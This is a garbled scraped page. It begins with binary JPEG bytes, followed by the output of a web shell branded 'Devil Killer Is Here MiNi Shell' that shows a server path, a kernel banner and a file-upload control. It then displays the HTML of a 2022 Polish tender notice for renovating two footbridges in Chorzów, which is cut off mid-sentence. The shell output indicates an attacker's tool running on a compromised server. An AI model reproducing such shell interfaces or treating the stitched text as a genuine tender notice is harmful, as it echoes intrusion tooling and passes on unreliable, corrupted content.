JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220629/0023069601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont kładek nad Drogową Trasą Średnicową (DW902) w Chorzowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Chorzów – Miejski Zarząd Ulic i Mostów w Chorzowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000166249</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bałtycka 8A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@mzuim.chorzow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.mzuim.chorzow.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> utrzymanie ulic i obiektów inżynierskich </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont kładek nad Drogową Trasą Średnicową (DW902) w Chorzowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e7ed856a-f79a-11ec-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00230696</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031666/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Remont kładek nad DTŚ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzuim.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną, tj.:<br/>1) poprzez Platformę przetargową pod adresem:<br/>https://mzuim/rejestracja/ustawowe.html (zwanej dalej Platformą przetargową lub Platformą), w wierszu oznaczonym tytułem oraz<br/>znakiem niniejszego postępowania<br/>lub<br/>2) pocztą elektroniczną na adres e-mail Zamawiającego: zp@mzuim.chorzow.eu oraz adresy e-mail Wykonawców podane w<br/>formularzach ofertowych.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć<br/>ofertę zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej, dostępnymi pod adresem:<br/>https://mzuim.logintrade.net/rejestracja/ustawowe.html<br/>oraz zaakceptować regulamin korzystania z Platformy przetargowej dostępny pod adresem:<br/>https://mzuim.logintrade.net/rejestracja/regulamin.html<br/>Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa wyżej.<br/>2. Wymagania techniczne związane z korzystaniem z Platformy przetargowej:<br/>https://mzuim.logintrade.net/rejestracja/instrukcje.html<br/>1) Wymagania techniczne, jakim musi odpowiadać sprzęt komputerowych Wykonawcy, aby móc korzystać z Platformy.<br/>a) Dopuszczalne przeglądarki internetowe:<br/>− Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>− Google Chrome 31<br/>− Mozilla Firefox 26<br/>− Opera 18<br/>2) Pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>3) Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. Równocześnie Zamawiający rekomenduje na<br/>format danych przesyłanych plików: .pdf.<br/>3. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej Właściciel, tj. Logintrade SA ul. Legnicka 57D,<br/>lokal B/J, 54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz.<br/>800 - 1600.<br/>4. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru<br/>opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników Platformy przetargowej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">podano w pkt XXVI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">podano w pkt XXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/AB/3410/019/000/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie prac remontowych mających na w celu przywrócenie do należytego stanu<br/>technicznego kładek dla pieszych Ck-7 oraz Ck-6 nad Drogową Trasą Średnicową w Chorzowie. Dokumentacja projektowa<br/>zakłada również zmianę formy balustrad oraz renowację elementów wyposażenia obiektu.<br/>2. Projektowane prace remontowe - Kładka CK-6<br/>Ze względu na stan elementów wyposażenia oraz uszkodzenia elementów konstrukcyjnych planowane są prace<br/>remontowe.<br/>1) Ustrój nośny<br/>Projektowane prace remontowe ustroju nośnego obejmują oczyszczenie pylonu oraz want, a następnie pokrycie elementów<br/>nową powłoką malarską. W miejscach korozji elementów należy wykonać piaskowanie elementów do głębokości na której<br/>nie występuje już korozja stali. Na fragmentach na których nie stwierdza się korozji stali elementów możliwe jest wykonanie<br/>wyłącznie nowej powłoki malarskiej. Warunkiem jest zastosowanie powłoki dopuszczonej do układania na już pomalowany<br/>element stalowy.<br/>Na bloku kotwiącym zostanie zastosowana iniekcja betonu mająca na celu zabezpieczenie bloku kotwiącego. Materiał<br/>iniekcyjny powinien wypełniać szczelnie powstałe rysy. Blok kotwiący należy oczyścić z powłoki malarskiej w celu weryfikacji<br/>czy nie powstały na nim dodatkowe rysy nie stwierdzone podczas oględzin. W przypadku uwidocznienia dodatkowych rys<br/>wykonać ich iniekcje. Po zakończonych pracach naprawczych wykonać nową powłokę antykorozyjną.<br/>2) Balustrady i osłony<br/>Projektuje się rozbiórkę elementów plexi na obiekcie i zastąpienie tych elementów balustradą aluminiową h=1,30m i<br/>dł.=2,0m. Panele plexi na obiekcie przymocowane są do kształtowników HEB100 i blach podtrzymujących. Blachy<br/>podtrzymujące należy zdemontować i przeznaczyć na złom. Pozostawione na obiekcie słupki HEB100 oczyścić i<br/>zabezpieczyć antykorozyjnie. Do środników słupków HEB100 należy przyspawać elementy stalowe, które będą stanowić<br/>mocowania dla nowych balustrad stalowych.<br/>3) Nawierzchnia chodników<br/>Nawierzchnia chodników wykonana z żywic epoksydowych i kruszywa. W miejscach ubytków materiału należy wykonać<br/>jego uzupełnienie. W przypadku stwierdzenia luźnych fragmentów materiału należy je usunąć. Podłoże przed uzupełnieniem<br/>należy oczyścić i przygotować według zaleceń producenta żywicy.<br/>4) Gzymsy<br/>Na powierzchni gzymsów występuje korozja stali oraz ubytki powłoki malarskiej. W miejscach korozji elementów należy<br/>wykonać piaskowanie elementów do głębokości na której nie występuje już korozja stali. Na fragmentach na których nie<br/>stwierdza się korozji stali elementów możliwe jest wykonanie wyłącznie nowej powłoki malarskiej. Warunkiem jest<br/>zastosowanie powłoki dopuszczonej do układania na już pomalowany element stalowy.<br/>5) Podpory<br/>Dla podpór projektuje się prace remontowe polegające na oczyszczeniu powierzchni betonu z graffiti i zanieczyszczeń oraz<br/>wykonani powłoki antykorozyjnej. W przypadku stwierdzenia miejsc korozji betonu należy wykonać naprawy zaprawą PCC<br/>oraz zabezpieczyć te miejsca powłoką antykorozyjną.<br/>6) Dylatacje<br/>Blachy przykrywające szczeliny dylatacyjne zdemontować, szczeliny oczyścić z zanieczyszczeń. Blachy poddać<br/>oczyszczeniu i ułożyć na nich nową powłokę antykorozyjną.<br/>7) Urządzenia obce<br/>Kanały kablowe w miejscach uszkodzenia należy przyciąć tak aby krawędzie były równe i w miejscach ubytków dołożyć<br/>wstawki z rur PVC. Dla kanałów w których znajdują się przewody zastosować kanały dwudzielne, które należy połączyć z<br/>istniejącymi kanałami, zapewniając szczelność połączenia.<br/>3. Projektowane prace remontowe - Kładka CK-7<br/>Ze względu na stan elementów wyposażenia oraz uszkodzenia elementów konstrukcyjnych planowane są prace<br/>remontowe.<br/>1) Ustrój nośny<br/>Projektowane prace remontowe ustroju nośnego obejmują oczyszczenie pylonu oraz want, a następnie pokrycie elementów<br/>nową powłoką malarską. W miejscach korozji elementów należy wykonać piaskowanie elementów do głębokości na której<br/>nie występuje już korozja stali. Na fragmentach na których nie stwierdza się korozji stali elementów możliwe jest wykonanie<br/>wyłącznie nowej powłoki malarskiej. Warunkiem jest zastosowanie powłoki dopuszczonej do układania na już pomalowany<br/>element stalowy.<br/>Na bloku kotwiącym zostanie zastosowana iniekcja betonu mająca na celu zabezpieczenie bloku kotwiącego. Materiał<br/>iniekcyjny powinien wypełniać szczelnie powstałe rysy. Blok kotwiący należy oczyścić z powłoki malarskiej w celu weryfikacji<br/>czy nie powstały na nim dodatkowe rysy nie stwierdzone podczas oględzin. W przypadku uwidocznienia dodatkowych rys<br/>wykonać ich iniekcje. Po zakończonych pracach naprawczych wykonać nową powłokę antykorozyjną.<br/>2) Balustrady i osłony<br/>Projektuje się rozbiórkę elementów plexi na obiekcie i zastąpienie tych elementów balustradą aluminiową h=1,30m i<br/>dł.=2,0m. Panele plexi na obiekcie przymocowane są do kształtowników HEB100 i blach podtrzymujących. Blachy<br/>podtrzymujące należy zdemontować i przeznaczyć na złom. Pozostawione na obiekcie słupki HEB100 oczyścić i zabezpieczyć antykorozyjnie. Do środników słupków HEB100 należy przyspawać elementy stalowe, które będą stanowić<br/>mocowania dla nowych balustrad stalowych.<br/>3) Nawierzchnia chodników<br/>Nawierzchnia chodników wykonana z żywic epoksydowych i kruszywa. W miejscach ubytków materiału należy wykonać<br/>jego uzupełnienie. W przypadku stwierdzenia luźnych fragmentów materiału należy je usunąć. Podłoże przed uzupełnieniem<br/>należy oczyścić i przygotować według zaleceń producenta żywicy.<br/>4) Gzymsy<br/>Na powierzchni gzymsów występuje korozja stali oraz ubytki powłoki malarskiej. W miejscach korozji elementów należy<br/>wykonać piaskowanie elementów do głębokości na której nie występuje już korozja stali. Na fragmentach na których nie<br/>stwierdza się korozji stali elementów możliwe jest wykonanie wyłącznie nowej powłoki malarskiej. Warunkiem jest<br/>zastosowanie powłoki dopuszczonej do układania na już pomalowany element stalowy.<br/>5) Podpory<br/>Dla podpór projektuje się prace remontowe polegające na oczyszczeniu powierzchni betonu z graffiti i zanieczyszczeń oraz<br/>wykonani powłoki antykorozyjnej. W przypadku stwierdzenia miejsc korozji betonu należy wykonać naprawy zaprawą PCC<br/>oraz zabezpieczyć te miejsca powłoką antykorozyjną.<br/>6) Dylatacje<br/>Blachy przykrywające szczeliny dylatacyjne zdemontować, szczeliny oczyścić z zanieczyszczeń. Blachy poddać<br/>oczyszczeniu i ułożyć na nich nową powłokę antykorozyjną.<br/>4. Szczegółowy opis przedmiotu zamówienia oraz sposób realizacji zamówienia przedstawiono w Dokumentacji<br/>projektowej, STWiORB i przedmiarach robót, które stanowią Załącznik nr 1 do niniejszej SWZ.<br/>5. UWAGI DOTYCZĄCE REALIZACJI PRZEDMIOTU ZAMÓWIENIA:<br/>1) Zamawiający informuje, iż ilekroć w niniejszej SWZ lub załącznikach do SWZ zostało wskazane pochodzenie (marka,<br/>znak towarowy, producent, dostawca) materiałów lub wskazano normy, oceny techniczne, specyfikacje techniczne bądź<br/>systemy referencji technicznych, o których mowa w art. 101 ust 1-3 ustawy Prawo zamówień publicznych zamawiający<br/>dopuszcza oferowanie materiałów lub rozwiązań „równoważnych” pod względem parametrów technicznych, użytkowych<br/>oraz eksploatacyjnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z wydanym pozwoleniem na budowę<br/>oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SWZ.<br/>2) Podczas prowadzenia prac w pasie drogowym – miejsce prowadzenia robót należy oznakować w sposób zgodny z<br/>warunkami określonymi w załącznikach nr 1-4 do Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie<br/>szczegółowych warunków technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego<br/>i warunków ich umieszczania na drogach.<br/>3) Wykonawca zobowiązany jest do opracowania oraz uzyskania zatwierdzenia projektu tymczasowej organizacji ruchu na<br/>czas prowadzenia robót. W terminie do tygodnia przed przystąpieniem do realizacji zadania Wykonawca przedłoży<br/>Zamawiającemu zatwierdzony projekt organizacji ruchu. Projekt podlega wcześniejszemu zaopiniowaniu przez Zespół ds.<br/>Bezpieczeństwa i Organizacji Ruchu Drogowego.<br/>4) W przypadku nie przedłożenia w terminie zatwierdzonego projektu tymczasowej organizacji ruchu, Zamawiający zleci<br/>wykonanie projektu tymczasowej organizacji ruchu a kosztami obciąży Wykonawcę.<br/>5) Wprowadzenie i utrzymanie tymczasowej organizacji ruchu zgodnie z przygotowanym przez Wykonawcę projektem<br/>zapewnia Zamawiający.<br/>6) Przez cały okres realizacji zamówienia Wykonawca odpowiada za przekazany plac budowy, zabezpieczenie miejsca<br/>prowadzenia robót, utrzymywanie oznakowania tymczasowego, czystość na jezdniach i chodnikach zarówno w rejonie<br/>prowadzonych prac jak również dróg dojazdowych do budowy. Wykonawca odpowiada za bezpieczeństwo oraz wszelkie<br/>szkody wobec osób trzecich powstałe w wyniku prowadzonych robót.<br/>7) Z uwagi na charakter i zakres robót, w tym konieczność demontażu balustrad i osłon zabezpieczających kładki dla<br/>pieszych nad DTŚ, Wykonawca zobowiązany jest zabezpieczyć teren budowy przed dostępem osób trzecich przez cały<br/>okres realizacji robót budowlanych oraz zapewnić całodobowy dozór terenu budowy. W sytuacjach awaryjnych za jakie<br/>uważa się np. naruszenie lub zniszczenie zabezpieczeń przez osoby trzecie, Wykonawca zobowiązany jest zapewnić<br/>naprawę zabezpieczenia w czasie do jednej godziny od otrzymania zgłoszenia od Zamawiającego lub od innych<br/>uprawnionych podmiotów, w szczególności: Policji, Straży Pożarnej, Miejskiego Centrum Zarządzania Kryzysowego lub<br/>Straży Miejskiej.<br/>8) pozostałe informacje podano w SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45234000-6 - Roboty budowlane w zakresie budowy kolei i systemów transportu</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">71352000-0 - Usługi badania podłoża</p> <p class="mb-0">71313000-5 - Usługi doradcze w zakresie środowiska naturalnego</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 1 i 2 ustawy:<br/>1) Sytuacja ekonomiczna lub finansowa:<br/>a) Wykonawca winien posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 100 000,- zł,<br/>b) Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 1 000 000,- zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie powyższy warunek oceniany będzie łącznie.<br/>2) Zdolność techniczna lub zawodowa:<br/>a) Kwalifikacje zawodowe osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Wykonawca skieruje do realizacji zamówienia osoby posiadające odpowiednie kwalifikacje zawodowe i doświadczenie<br/>zawodowe, potwierdzone uprawnieniami do kierowania robotami budowlanymi niezbędne do wykonania zamówienia, w<br/>szczególności<br/>wyznaczy kierownika budowy (1 osoba) posiadającego uprawnienia budowlane bez ograniczeń do kierowania robotami<br/>budowlanymi w specjalności inżynieryjnej mostowej.<br/>Uwaga:<br/>Zamawiający dopuszcza uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, o<br/>których mowa w ustawie z dnia 07.07.1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane<br/>wydane na podstawie uprzednio obowiązujących przepisów prawa. W przypadku, gdy Wykonawca wskaże osobę spoza<br/>terytorium RP osoba ta musi:<br/>• Posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanej branży budowlanej w kraju<br/>zamieszkania tych osób.<br/>• Posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży budowlanej na zasadach określonych w<br/>przepisach odrębnych, tj. m.in. w ustawie z dnia 22.12.2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich 